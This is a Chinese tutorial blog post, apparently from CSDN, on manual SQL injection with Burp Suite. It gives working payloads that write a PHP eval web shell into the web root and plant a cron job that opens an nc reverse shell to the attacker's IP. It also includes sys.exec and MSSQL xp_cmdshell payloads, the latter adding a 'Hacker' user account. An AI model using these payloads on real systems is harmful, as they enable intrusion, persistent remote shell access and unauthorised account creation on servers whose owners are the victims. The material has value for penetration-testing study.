SQL手工注入

启动burpsuite监听网页

在监听到的页面右键点击Send to Repeater
在这里插入图片描述

然后跳转到Repeater
在这里插入图片描述在输入框输入【 ‘ "】
测试是否存在注入点

对username,password进行一个个试。如果存在会返回界面会不一样。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
当我们找到注入点
可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。
G9nLmNzZG4ubmV0L3dlaXhpbl80NTQ0MTcyNw==,size_16,color_FFFFFF,t_70)
在这里插入图片描述

‘order by 4#  报错
‘order by 3#页面正常

有3个字段

‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#
将php代码写入/var/www/html下的888。php
union一个操作符,必须SELECT语句组成。
/var/www/html网页文件的路径
into outfile导出多行数据,文件名必须全路径(绝对路径)
dumpfile功能一样但是只能导出一行数据

一句话木马详细解析

写一句话木马(基本操作)
得到webshell
whereis 查看命令的路径
查看nc命令的绝对路径

注当前此linux版本存在nc漏洞,可根据版本更改

更多漏洞

返回/usr/bin/nc.traditional
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
在这里插入图片描述

解析* * * * *分别对应 分 时 日 月 周 
这里利用的linux的系统定时任务

开启监听!!

一定要监听
nc -nlvp 监听端口等待一分钟后回弹。默认五个*是一分钟

直接连接

通过sys.exec命令来执行命令。

union select “”,””,”sys.exec(/usr/bin/nc.traditional  –c /bin/sh kail的IP  监听端口)”#

在这里插入图片描述

在这里插入图片描述

其他注入

03以上老版本使用

'exec master.dbo.xp_cmdshell 'net user Hacker P@ssword /add'--
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值